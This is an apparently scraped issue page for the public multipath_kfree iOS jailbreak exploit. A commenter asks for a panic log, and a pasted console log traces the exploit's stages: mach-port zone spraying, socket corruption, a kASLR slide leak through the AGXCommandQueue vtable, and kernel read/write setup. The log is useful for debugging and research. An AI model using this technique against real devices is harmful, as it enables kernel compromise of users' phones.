Comments (3)
Can you provide the panic log from that time? I think your offset may be incorrect.
from multipath_kfree.
██╗ ██╗ ██████╗ ██████╗ ██████╗ ███████╗
╚██╗██╔╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
╚███╔╝ ██║ ██║ ██║██║ ██║█████╗
██╔██╗ ██║ ██║ ██║██║ ██║██╔══╝
██╔╝ ██╗╚██████╗╚██████╔╝██████╔╝███████╗
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝
Hello there debugger, thanks for debugging me, but I might be unreliable with big brother watching me (kernel panics).
Debug server process id: 356 group process id: 357
Stage 1: Exploiting the kernel.
offsets selected for iOS 11.3 or above
build_id: 15E302
sysname: Darwin
nodename: Luoei-5s
release: 17.5.0
version: Darwin Kernel Version 17.5.0: Tue Mar 13 21:32:12 PDT 2018; root:xnu-4570.52.2~8/RELEASE_ARM64_S5L8960X
machine: iPhone6,2
Your device isn't supported yet, find your offsets and add them to offsets.m in the project.
Initializing multipath_kfree bug...
Filling the zone with 10,000 machports...
Filling the zone with another 0x20 machports serving as our first port for corruption...
Creating our first socket...
Our first socket descriptor is: 3
Filling our the zone and our first port array with the remaining 68 ports...
Creating the rest of our 15 sockets...
Initializing empty messages for all of our potential first ports...
Freeing first and second in our socket struct and praying that we are still here...
Finding corrupt port in that zone so we can leak the kernel ASLR shift later...
Port 0x26d603 is corrupt!
Corrupt port: 0026D603 31
Filling ports to serve as a zone spray for finding the kASLR slide and getting r/w...
Initializing empty messages for all of our sprayed ports...
Receiving the response message from our corrupt port, leaking the address of our new contained port...
Refill port is at 0xfffffff1136c07a0
Sending an empty message to our corrupted port...
Freeing the contained port using multipath bug...
Port 0x26d603 is corrupt!
Leaking kASLR by filling the zone with userclients to AGXCommandQueue...
Receiving back from our corrupt port, leaking the address of the userclient...
Calculating the address of the vtable of AGXCommandQueue from the leaked userclient...
AGXCommandQueue vtable is at: 0xfffffff00b48d8c0
Calculating kaslr_shift, if this displays 0xffff(something) then check if the vtable offset is correct!
kaslr shift: 0xfffffff00b48d8c0
Destroying the corrupted port as we now have the kASLR slide...
Filling the zone again with some random ports so we can get kernel read write...
Setting up kernel r/w access using s1guza's gadgets...
from multipath_kfree.
from multipath_kfree.
Related Issues (4)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from multipath_kfree.